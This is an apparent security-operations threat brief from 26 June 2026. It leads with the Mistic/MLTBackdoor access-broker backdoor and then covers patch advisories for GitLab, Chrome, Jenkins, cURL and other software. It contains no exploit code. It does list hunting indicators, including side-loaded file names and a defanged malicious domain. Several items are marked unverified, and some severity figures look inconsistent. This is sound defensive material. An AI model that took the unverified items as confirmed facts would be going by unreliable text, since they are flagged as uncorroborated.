ELEVATED 4 min read 26 Jun 2026

Backdoor.Mistic / MLTBackdoor access-broker intrusions

Backdoor.Mistic / MLTBackdoor leads today’s 32 findings because it gives SOC teams concrete detection work now. Chrome CVE-2026-13021, GitLab CVE-2026-0934, Lemur credential exposure, and OT and medical advisories add patch and exposure checks across high-value systems. 29 further items tracked below.

Key findings
01
Backdoor.Mistic / MLTBackdoor access-broker intrusions
MEDIUM
[Medium] Backdoor.Mistic / MLTBackdoor is the lead detection item because the reported activity links a self-deleting backdoor to access-broker intrusions that can support later ransomware access.
02
Microsoft Azure Linux 25 June batch needs CERT-FR routing
LOW
[Unverified] Microsoft Azure Linux entered CERT-FR tracking through CERTFR-2026-AVI-0802. Cloud and platform teams should validate Azure Linux image, node, and base-container update channels across workloads that inherit Microsoft-maintained base components.
03
GitLab CE/EE multi-CVE patch batch reaches EU routing with later corroboration
MEDIUM
CVSS 3.8 low · CWE-863 Incorrect Authorization · EPSS 10th percentile. GitLab CE/EE is backed by CERT-Bund, NCSC-NL, and CERT-FR entries, with CVE-2026-0934 named in the brief. Platform and AppSec teams should validate fixed versions, prioritise self-managed and internet-facing instances, and restrict admin and API exposure during rollout.
CVE-2026-0934
04
Jenkins Plugins CVE-2026-57280 batch needs CERT-Bund high queue
HIGH
CVSS 8.8 high · CWE-693 Protection Mechanism Failure · EPSS 29th percentile. Jenkins Plugins entered CERT-Bund’s high queue under CVE-2026-57280 and WID-SEC-2026-2074. CI/CD teams should map controllers, enumerate plugin versions, and schedule updates before the next major build window.
CVE-2026-57280
05
n8n GHSA batch adds workflow-automation patch triage
LOW
[Unverified] n8n is present in CERT-Bund tracking as WID-SEC-2026-2067. Automation teams should map n8n instances, check vendor fix status, and assess stored workflow secrets and exposed webhooks.
06
Flowise CVE-2025-71332 remains unpatched in CERT-Bund update
MEDIUM
CVSS 5.9 medium · CWE-564 · EPSS 15th percentile. Flowise CVE-2025-71332 remains listed as unpatched in the CERT-Bund update. Teams using Flowise should identify exposed deployments, document exceptions, and restrict access where a fixed version is not yet available for their environment.
CVE-2025-71332
07
RabbitMQ CVE-2026-57215 patch batch reaches EU message-broker owners
LOW
[Unverified] RabbitMQ CVE-2026-57215 reached CERT-Bund under WID-SEC-2026-2079. Platform teams should check broker versions, management-plugin exposure, and network reachability for shared messaging clusters.
CVE-2026-57215
08
Google Chrome CVE-2026-13021 high-severity advisory needs CERT-Bund and CERT-FR
MEDIUM
CVSS 4.3 medium · CWE-346 Origin Validation Error · EPSS 2th percentile. Google Chrome CVE-2026-13021 has both CERT-Bund and CERT-FR coverage, giving endpoint teams enough corroboration to check managed patch levels. The check should include Chrome and Chromium on workstations, browser automation images, and internal tooling that packages Chromium components.
CVE-2026-13021
09
cURL CVE-2026-8286 patch batch reaches CERT-Bund routing
LOW
[Unverified] cURL CVE-2026-8286 reached CERT-Bund as WID-SEC-2026-2065. Application and infrastructure teams should check systems embedding curl or libcurl, including containers, appliances, language runtimes, and bundled tooling.
CVE-2026-8286
10
Podman CVE-2026-57231 information-disclosure advisory needs CERT-Bund
LOW
[Unverified] Podman CVE-2026-57231 reached CERT-Bund as an information-disclosure advisory. Container platform teams should validate Podman versions and confirm packaging sources across developer workstations, build systems, and container hosts.
CVE-2026-57231

Backdoor.Mistic / MLTBackdoor access-broker intrusions

Backdoor.Mistic / MLTBackdoor is the lead detection item because the reported activity links a self-deleting backdoor to access-broker intrusions that can support later ransomware access. SOC teams should push hunts for MpExtMs.exe side-loading, EndpointDlp.dll, data.bin, rs2y15sungu[.]com, ClickFix/FileFix execution, and self-deletion behaviour.

Identifiers: Backdoor.Mistic, MLTBackdoor

Sources: [The Register Mistic coverage](https://www.theregister.com/security/2026/06/25/self-destructing-mistic-backdoor-linked-to-access-broker-selling-corporate-footholds-to-ransomware-gangs/5262579); [Security.com Mistic analysis](https://www.security.com/threat-intelligence/new-mistic-backdoor-modelorat); [Zscaler MLTBackdoor technical analysis](https://www.zscaler.com/blogs/security-research/technical-analysis-mltbackdoor)

Microsoft Azure Linux 25 June batch needs CERT-FR routing

Microsoft Azure Linux entered CERT-FR tracking through CERTFR-2026-AVI-0802. Cloud and platform teams should validate Azure Linux image, node, and base-container update channels across workloads that inherit Microsoft-maintained base components.

Identifiers: CERTFR-2026-AVI-0802

Sources: [CERT-FR advisory CERTFR-2026-AVI-0802](https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0802/)

GitLab CE/EE multi-CVE patch batch reaches EU routing with later corroboration

GitLab CE/EE is backed by CERT-Bund, NCSC-NL, and CERT-FR entries, with CVE-2026-0934 named in the brief. Platform and AppSec teams should validate fixed versions, prioritise self-managed and internet-facing instances, and restrict admin and API exposure during rollout.

Identifiers: CVE-2026-0934, WID-SEC-2026-2070, NCSC-2026-0211

Sources: [CERT-Bund WID-SEC-2026-2070](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2070); [NCSC-NL advisory NCSC-2026-0211](https://advisories.ncsc.nl/advisory?id=NCSC-2026-0211); [CERT-FR advisory CERTFR-2026-AVI-0799](https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0799/)

Jenkins Plugins CVE-2026-57280 batch needs CERT-Bund high queue

Jenkins Plugins entered CERT-Bund’s high queue under CVE-2026-57280 and WID-SEC-2026-2074. CI/CD teams should map controllers, enumerate plugin versions, and schedule updates before the next major build window.

Identifiers: CVE-2026-57280, WID-SEC-2026-2074

Sources: [CERT-Bund WID-SEC-2026-2074](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2074)

n8n GHSA batch adds workflow-automation patch triage

n8n is present in CERT-Bund tracking as WID-SEC-2026-2067. Automation teams should map n8n instances, check vendor fix status, and assess stored workflow secrets and exposed webhooks.

Identifiers: WID-SEC-2026-2067

Sources: [CERT-Bund WID-SEC-2026-2067](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2067)

Flowise CVE-2025-71332 remains unpatched in CERT-Bund update

Flowise CVE-2025-71332 remains listed as unpatched in the CERT-Bund update. Teams using Flowise should identify exposed deployments, document exceptions, and restrict access where a fixed version is not yet available for their environment.

Identifiers: CVE-2025-71332, WID-SEC-2025-0717

Sources: [CERT-Bund WID-SEC-2025-0717](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2025-0717)

RabbitMQ CVE-2026-57215 patch batch reaches EU message-broker owners

RabbitMQ CVE-2026-57215 reached CERT-Bund under WID-SEC-2026-2079. Platform teams should check broker versions, management-plugin exposure, and network reachability for shared messaging clusters.

Identifiers: CVE-2026-57215, WID-SEC-2026-2079

Sources: [CERT-Bund WID-SEC-2026-2079](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2079)

Google Chrome CVE-2026-13021 high-severity advisory needs CERT-Bund and CERT-FR

Google Chrome CVE-2026-13021 has both CERT-Bund and CERT-FR coverage, giving endpoint teams enough corroboration to check managed patch levels. The check should include Chrome and Chromium on workstations, browser automation images, and internal tooling that packages Chromium components.

Identifiers: CVE-2026-13021, WID-SEC-2026-2071

Sources: [CERT-Bund WID-SEC-2026-2071](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2071); [CERT-FR advisory CERTFR-2026-AVI-0801](https://www.cert.ssi.gouv.fr/avis/CERTFR-2026-AVI-0801/)

cURL CVE-2026-8286 patch batch reaches CERT-Bund routing

cURL CVE-2026-8286 reached CERT-Bund as WID-SEC-2026-2065. Application and infrastructure teams should check systems embedding curl or libcurl, including containers, appliances, language runtimes, and bundled tooling.

Identifiers: CVE-2026-8286, WID-SEC-2026-2065

Sources: [CERT-Bund WID-SEC-2026-2065](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2065)

Podman CVE-2026-57231 information-disclosure advisory needs CERT-Bund

Podman CVE-2026-57231 reached CERT-Bund as an information-disclosure advisory. Container platform teams should validate Podman versions and confirm packaging sources across developer workstations, build systems, and container hosts.

Identifiers: CVE-2026-57231, WID-SEC-2026-2062

Sources: [CERT-Bund WID-SEC-2026-2062](https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2062)

Also tracked

  • OpenBSD CVE-2026-57589 privilege-escalation advisory appears in EU feed · CVE-2026-57589 · High
  • Drupal CVE-2026-13231 medium-severity batch needs CERT-Bund routing · CVE-2026-13231 · Unknown
  • Snipe-IT CVE-2026-55452 asset-management advisory needs CERT-Bund · CVE-2026-55452 · Unknown
  • Zammad WID-SEC-2026-2075 file-deletion advisory needs EU support-desk queue
  • PowerDNS Authoritative Server CVE-2026-42005 DoS advisory needs CERT-Bund · CVE-2026-42005 · Medium
  • runc is a CLI tool for spawning and running containers on Linux according to the · CVE-2024-21626 · Unknown
  • Linux Kernel CVE-2026-52944 batch needs CERT-Bund high-severity routing · CVE-2026-52944 · Not_scored
  • ProFTPD CVE-2026-35025 unpatched high-severity advisory · CVE-2026-35025 · High
  • DENX U-Boot CVE-2026-46728 security-bypass advisory needs EU feed · CVE-2026-46728 · High
  • pydicom pynetdicom Library reaches CISA medical advisory queue · CVE-2026-56445 · High
  • H.VIEW HV-500S6 IP Camera needs CISA ICS exposure queue · CVE-2026-55975 · Unknown
  • EVoke Systems charging-station management flaws allow unauthorised control · CVE-2026-40702 · Critical
  • Daktronics Controller Firmware path traversal/default-credential batch can reach root control · CVE-2026-28701 · Unknown
  • OHIF DICOM viewer SSRF can leak clinician OIDC bearer tokens · CVE-2026-12473 · High
  • Delta Electronics DTM Soft deserialization issue enables code execution · CVE-2026-12578 · Unknown
  • Horner Automation Cscape advisory needs engineering workstation owners · CVE-2026-12897 · High
  • Schneider Electric PowerLogic P7 advisory adds energy OT patch routing · CVE-2026-9716 · High
  • Yokogawa FAST/TOOLS and CI Server advisory targets SCADA owners · CVE-2026-11833 · High
  • Lemur ACME SSRF plus creator-equality IDOR can expose AWS IAM and PKI keys · CVE-2026-55166 · Critical
  • GitHub MCP Server lockdown singleton can mix cross-user GraphQL clients · CVE-2026-48529 · Medium
  • Cordyceps CI/CD Flaws Expose 300+ GitHub Repositories to Supply-Chain Attacks
  • GitHub Updates actions/checkout to Block Common Pwn Request Attack Patterns
  • HP LaserJet Pro backup/restore CVE patch batch reaches NVD feed · CVE-2023-35176 · High
  • Portwell Engineering Toolkits CVE-2026-3437 local memory read/write path · CVE-2026-3437 · Critical
  • The Patch Fixed the Bug. Nobody Fixed the Configuration. · CVE-2024-40766 · Unknown
  • CL-STA-1062 / UAT-7237 TinyRCT campaign targets government and critical energy
  • CL-STA-1062 Targets Southeast Asian Governments and Critical Infrastructure
  • Malicious hackers exploit Cisco zero-day for highest access level at communications service provider
  • StealC You Later: Proofpoint and IBM X-Force Support Operation Endgame Disruptions
cve-2025-71332cve-2026-0934cve-2026-13021cve-2026-57215cve-2026-57231cve-2026-57280cve-2026-8286misticmltbackdoorotsecurity

Act on this brief

Map detection coverage gaps for the techniques above, or generate Sigma rules from the named CVEs.

Try DCV Try CloudSigma ← Back to feed